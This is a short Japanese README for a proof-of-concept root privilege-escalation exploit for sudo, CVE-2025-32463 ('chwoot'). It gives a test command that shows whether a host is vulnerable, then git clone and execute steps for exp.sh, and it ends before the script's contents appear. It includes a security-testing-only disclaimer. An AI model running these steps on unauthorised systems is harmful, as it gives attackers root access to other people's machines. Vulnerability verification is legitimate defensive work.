
用于CVE-2025-32463 sudo_chwoot的権限昇格POCです。gccコンパイル環境がある場合とない場合の両方に対応しており、ダウンロードして実行するだけで一発で完了します。
声明:本スクリプトはセキュリティテストのみを目的としており、不正な用途での使用は禁止されています。 CVE-2025-32463 sudo_chwoot 権限昇格脆弱性の検証スクリプト
インターネット上の他のPOCと比較して、一部のホストにはgccがインストールされておらず、ビルド環境が不足していることを考慮し、本スクリプトは以下の2つのシナリオに対応しています:
脆弱性の存在を確認する:
sudo -R woot woot
脆弱性が存在する場合の結果:
sudo: woot: No such file or directory
脆弱性が存在しない場合の結果:
sudo: you are not permitted to use the -R option with woot
脆弱性が存在する場合、POCを使用して権限昇格を実行:
git clone https://github.com/Yuy0ung/CVE-2025-32463_chwoot.git
cd CVE-2025-32463_chwoot
chmod +x ./exp.sh
./exp.sh

ファイル内容は以下の通りです